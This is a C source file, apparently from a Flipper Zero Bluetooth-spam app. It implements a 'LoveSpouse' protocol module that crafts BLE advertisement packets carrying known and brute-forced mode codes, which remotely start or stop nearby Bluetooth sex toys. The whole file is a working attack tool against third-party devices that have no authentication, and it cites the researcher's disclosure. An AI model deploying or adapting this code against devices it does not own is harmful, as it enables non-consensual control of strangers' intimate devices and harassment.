lovespouse.c 9.9 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318
  1. #include "lovespouse.h"
  2. #include "_protocols.h"
  3. // Hacked together by @Willy-JL
  4. // Discovered by @mandomat
  5. // Blog post at https://mandomat.github.io/2023-11-13-denial-of-pleasure/
  6. typedef struct {
  7. uint32_t value;
  8. const char* name;
  9. } LovespouseMode;
  10. static const LovespouseMode plays[] = {
  11. // clang-format off
  12. {0xE49C6C, "Classic 1"},
  13. {0xE7075E, "Classic 2"},
  14. {0xE68E4F, "Classic 3"},
  15. {0xE1313B, "Classic 4"},
  16. {0xE0B82A, "Classic 5"},
  17. {0xE32318, "Classic 6"},
  18. {0xE2AA09, "Classic 7"},
  19. {0xED5DF1, "Classic 8"},
  20. {0xECD4E0, "Classic 9"},
  21. {0xD41F5D, "Independent 1-1"},
  22. {0xD7846F, "Independent 1-2"},
  23. {0xD60D7E, "Independent 1-3"},
  24. {0xD1B20A, "Independent 1-4"},
  25. {0xD0B31B, "Independent 1-5"},
  26. {0xD3A029, "Independent 1-6"},
  27. {0xD22938, "Independent 1-7"},
  28. {0xDDDEC0, "Independent 1-8"},
  29. {0xDC57D1, "Independent 1-9"},
  30. {0xA4982E, "Independent 2-1"},
  31. {0xA7031C, "Independent 2-2"},
  32. {0xA68A0D, "Independent 2-3"},
  33. {0xA13579, "Independent 2-4"},
  34. {0xA0BC68, "Independent 2-5"},
  35. {0xA3275A, "Independent 2-6"},
  36. {0xA2AE4B, "Independent 2-7"},
  37. {0xAD59B3, "Independent 2-8"},
  38. {0xACD0A2, "Independent 2-9"},
  39. // clang-format on
  40. };
  41. static const LovespouseMode stops[] = {
  42. {0xE5157D, "Classic Stop"},
  43. {0xD5964C, "Independent 1 Stop"},
  44. {0xA5113F, "Independent 2 Stop"},
  45. };
  46. static const struct {
  47. const LovespouseMode* modes;
  48. uint8_t count;
  49. } modes[LovespouseStateCOUNT] = {
  50. [0] = {plays, COUNT_OF(plays)},
  51. [LovespouseStatePlay] = {plays, COUNT_OF(plays)},
  52. [LovespouseStateStop] = {stops, COUNT_OF(stops)},
  53. };
  54. static const char* get_name(const Payload* payload) {
  55. UNUSED(payload);
  56. return "LoveSpouse";
  57. }
  58. static void make_packet(uint8_t* _size, uint8_t** _packet, Payload* payload) {
  59. LovespouseCfg* cfg = payload ? &payload->cfg.lovespouse : NULL;
  60. LovespouseState state;
  61. if(cfg && cfg->state != 0x00) {
  62. state = cfg->state;
  63. } else {
  64. const LovespouseState states[] = {
  65. LovespouseStatePlay,
  66. LovespouseStateStop,
  67. };
  68. state = states[rand() % COUNT_OF(states)];
  69. }
  70. uint32_t mode;
  71. switch(cfg ? payload->mode : PayloadModeRandom) {
  72. case PayloadModeRandom:
  73. default:
  74. mode = modes[state].modes[rand() % modes[state].count].value;
  75. break;
  76. case PayloadModeValue:
  77. mode = cfg->mode;
  78. break;
  79. case PayloadModeBruteforce:
  80. mode = cfg->mode = payload->bruteforce.value;
  81. break;
  82. }
  83. uint8_t size = 22;
  84. uint8_t* packet = malloc(size);
  85. uint8_t i = 0;
  86. packet[i++] = 2; // Size
  87. packet[i++] = 0x01; // AD Type (Flags)
  88. packet[i++] = 0x1A; // Flags
  89. packet[i++] = 14; // Size
  90. packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
  91. packet[i++] = 0xFF; // Company ID (Typo Products, LLC)
  92. packet[i++] = 0x00; // ...
  93. packet[i++] = 0x6D;
  94. packet[i++] = 0xB6;
  95. packet[i++] = 0x43;
  96. packet[i++] = 0xCE;
  97. packet[i++] = 0x97;
  98. packet[i++] = 0xFE;
  99. packet[i++] = 0x42;
  100. packet[i++] = 0x7C;
  101. packet[i++] = (mode >> 0x10) & 0xFF;
  102. packet[i++] = (mode >> 0x08) & 0xFF;
  103. packet[i++] = (mode >> 0x00) & 0xFF;
  104. packet[i++] = 3; // Size
  105. packet[i++] = 0x03; // AD Type (Service UUID List)
  106. packet[i++] = 0x8F; // Service UUID (Unregistered)
  107. packet[i++] = 0xAE; // ...
  108. *_size = size;
  109. *_packet = packet;
  110. }
  111. enum {
  112. _ConfigExtraStart = ConfigExtraStart,
  113. ConfigMode,
  114. ConfigCOUNT,
  115. };
  116. static void config_callback(void* _ctx, uint32_t index) {
  117. Ctx* ctx = _ctx;
  118. scene_manager_set_scene_state(ctx->scene_manager, SceneConfig, index);
  119. switch(index) {
  120. case ConfigMode:
  121. scene_manager_next_scene(ctx->scene_manager, SceneLovespouseMode);
  122. break;
  123. default:
  124. ctx->fallback_config_enter(ctx, index);
  125. break;
  126. }
  127. }
  128. static void mode_changed(VariableItem* item) {
  129. Payload* payload = variable_item_get_context(item);
  130. LovespouseCfg* cfg = &payload->cfg.lovespouse;
  131. uint8_t index = variable_item_get_current_value_index(item);
  132. if(index) {
  133. index--;
  134. payload->mode = PayloadModeValue;
  135. cfg->mode = modes[cfg->state].modes[index].value;
  136. variable_item_set_current_value_text(item, modes[cfg->state].modes[index].name);
  137. } else {
  138. payload->mode = PayloadModeRandom;
  139. variable_item_set_current_value_text(item, "Random");
  140. }
  141. }
  142. static void extra_config(Ctx* ctx) {
  143. Payload* payload = &ctx->attack->payload;
  144. LovespouseCfg* cfg = &payload->cfg.lovespouse;
  145. VariableItemList* list = ctx->variable_item_list;
  146. VariableItem* item;
  147. uint8_t value_index;
  148. item = variable_item_list_add(
  149. list, "Toy Mode", modes[cfg->state].count + 1, mode_changed, payload);
  150. const char* mode_name = NULL;
  151. char mode_name_buf[9];
  152. switch(payload->mode) {
  153. case PayloadModeRandom:
  154. default:
  155. mode_name = "Random";
  156. value_index = 0;
  157. break;
  158. case PayloadModeValue:
  159. for(uint8_t i = 0; i < modes[cfg->state].count; i++) {
  160. if(cfg->mode == modes[cfg->state].modes[i].value) {
  161. mode_name = modes[cfg->state].modes[i].name;
  162. value_index = i + 1;
  163. break;
  164. }
  165. }
  166. if(!mode_name) {
  167. snprintf(mode_name_buf, sizeof(mode_name_buf), "%06lX", cfg->mode);
  168. mode_name = mode_name_buf;
  169. value_index = modes[cfg->state].count + 1;
  170. }
  171. break;
  172. case PayloadModeBruteforce:
  173. mode_name = "Bruteforce";
  174. value_index = modes[cfg->state].count + 1;
  175. break;
  176. }
  177. variable_item_set_current_value_index(item, value_index);
  178. variable_item_set_current_value_text(item, mode_name);
  179. variable_item_list_set_enter_callback(list, config_callback, ctx);
  180. }
  181. static uint8_t config_count(const Payload* payload) {
  182. UNUSED(payload);
  183. return ConfigCOUNT - ConfigExtraStart - 1;
  184. }
  185. const Protocol protocol_lovespouse = {
  186. .icon = &I_heart,
  187. .get_name = get_name,
  188. .make_packet = make_packet,
  189. .extra_config = extra_config,
  190. .config_count = config_count,
  191. };
  192. static void mode_callback(void* _ctx, uint32_t index) {
  193. Ctx* ctx = _ctx;
  194. Payload* payload = &ctx->attack->payload;
  195. LovespouseCfg* cfg = &payload->cfg.lovespouse;
  196. if(index == 0) {
  197. payload->mode = PayloadModeRandom;
  198. view_dispatcher_send_custom_event(ctx->view_dispatcher, 0);
  199. } else if(index == modes[cfg->state].count + 1U) {
  200. scene_manager_next_scene(ctx->scene_manager, SceneLovespouseModeCustom);
  201. } else if(index == modes[cfg->state].count + 2U) {
  202. payload->mode = PayloadModeBruteforce;
  203. payload->bruteforce.counter = 0;
  204. payload->bruteforce.value = cfg->mode;
  205. payload->bruteforce.size = 3;
  206. view_dispatcher_send_custom_event(ctx->view_dispatcher, 0);
  207. } else {
  208. payload->mode = PayloadModeValue;
  209. cfg->mode = modes[cfg->state].modes[index - 1].value;
  210. view_dispatcher_send_custom_event(ctx->view_dispatcher, 0);
  211. }
  212. }
  213. void scene_lovespouse_mode_on_enter(void* _ctx) {
  214. Ctx* ctx = _ctx;
  215. Payload* payload = &ctx->attack->payload;
  216. LovespouseCfg* cfg = &payload->cfg.lovespouse;
  217. Submenu* submenu = ctx->submenu;
  218. uint32_t selected = 0;
  219. submenu_add_item(submenu, "Random", 0, mode_callback, ctx);
  220. if(payload->mode == PayloadModeRandom) {
  221. selected = 0;
  222. }
  223. bool found = false;
  224. for(uint8_t i = 0; i < modes[cfg->state].count; i++) {
  225. submenu_add_item(submenu, modes[cfg->state].modes[i].name, i + 1, mode_callback, ctx);
  226. if(!found && payload->mode == PayloadModeValue &&
  227. cfg->mode == modes[cfg->state].modes[i].value) {
  228. found = true;
  229. selected = i + 1;
  230. }
  231. }
  232. submenu_add_item(submenu, "Custom", modes[cfg->state].count + 1, mode_callback, ctx);
  233. if(!found && payload->mode == PayloadModeValue) {
  234. selected = modes[cfg->state].count + 1;
  235. }
  236. submenu_add_item(submenu, "Bruteforce", modes[cfg->state].count + 2, mode_callback, ctx);
  237. if(payload->mode == PayloadModeBruteforce) {
  238. selected = modes[cfg->state].count + 2;
  239. }
  240. submenu_set_selected_item(submenu, selected);
  241. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
  242. }
  243. bool scene_lovespouse_mode_on_event(void* _ctx, SceneManagerEvent event) {
  244. Ctx* ctx = _ctx;
  245. if(event.type == SceneManagerEventTypeCustom) {
  246. scene_manager_previous_scene(ctx->scene_manager);
  247. return true;
  248. }
  249. return false;
  250. }
  251. void scene_lovespouse_mode_on_exit(void* _ctx) {
  252. Ctx* ctx = _ctx;
  253. submenu_reset(ctx->submenu);
  254. }
  255. static void mode_custom_callback(void* _ctx) {
  256. Ctx* ctx = _ctx;
  257. Payload* payload = &ctx->attack->payload;
  258. LovespouseCfg* cfg = &payload->cfg.lovespouse;
  259. payload->mode = PayloadModeValue;
  260. cfg->mode =
  261. (ctx->byte_store[0] << 0x10) + (ctx->byte_store[1] << 0x08) + (ctx->byte_store[2] << 0x00);
  262. view_dispatcher_send_custom_event(ctx->view_dispatcher, 0);
  263. }
  264. void scene_lovespouse_mode_custom_on_enter(void* _ctx) {
  265. Ctx* ctx = _ctx;
  266. Payload* payload = &ctx->attack->payload;
  267. LovespouseCfg* cfg = &payload->cfg.lovespouse;
  268. ByteInput* byte_input = ctx->byte_input;
  269. byte_input_set_header_text(byte_input, "Enter custom Toy Mode");
  270. ctx->byte_store[0] = (cfg->mode >> 0x10) & 0xFF;
  271. ctx->byte_store[1] = (cfg->mode >> 0x08) & 0xFF;
  272. ctx->byte_store[2] = (cfg->mode >> 0x00) & 0xFF;
  273. byte_input_set_result_callback(
  274. byte_input, mode_custom_callback, NULL, ctx, (void*)ctx->byte_store, 3);
  275. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
  276. }
  277. bool scene_lovespouse_mode_custom_on_event(void* _ctx, SceneManagerEvent event) {
  278. Ctx* ctx = _ctx;
  279. if(event.type == SceneManagerEventTypeCustom) {
  280. scene_manager_previous_scene(ctx->scene_manager);
  281. scene_manager_previous_scene(ctx->scene_manager);
  282. return true;
  283. }
  284. return false;
  285. }
  286. void scene_lovespouse_mode_custom_on_exit(void* _ctx) {
  287. UNUSED(_ctx);
  288. }